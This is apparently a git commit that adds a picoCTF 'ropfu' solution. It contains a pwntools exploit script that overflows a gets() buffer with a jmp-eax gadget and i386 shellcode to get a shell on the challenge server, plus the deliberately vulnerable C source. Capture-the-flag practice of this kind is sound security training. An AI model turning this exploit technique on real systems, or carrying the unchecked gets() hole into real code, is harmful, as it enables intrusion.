pwn/ropfu

This commit is contained in:
2026-07-03 17:02:59 +09:00
parent a0e80a7aa4
commit a0718eed0c
3 changed files with 70 additions and 0 deletions
+43
View File
@@ -0,0 +1,43 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "saturn.picoctf.net 60930".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
offset = 28 # found with pwndbg
rop = ROP(exe)
jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address
for _ in range(offset - len(jmp_eax)):
rop.raw(asm('nop'))
rop.raw(jmp_eax)
# NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret'
jmp_eax_gadget = next(exe.search(asm("jmp eax")))
rop.raw(jmp_eax_gadget)
rop.raw(asm(shellcraft.i386.linux.sh()))
r.sendline(rop.chain())
r.interactive()
r.close()
if __name__ == "__main__":
main()
Executable
BIN
View File
Binary file not shown.
+27
View File
@@ -0,0 +1,27 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 16
void vuln() {
char buf[16];
printf("How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n");
return gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
}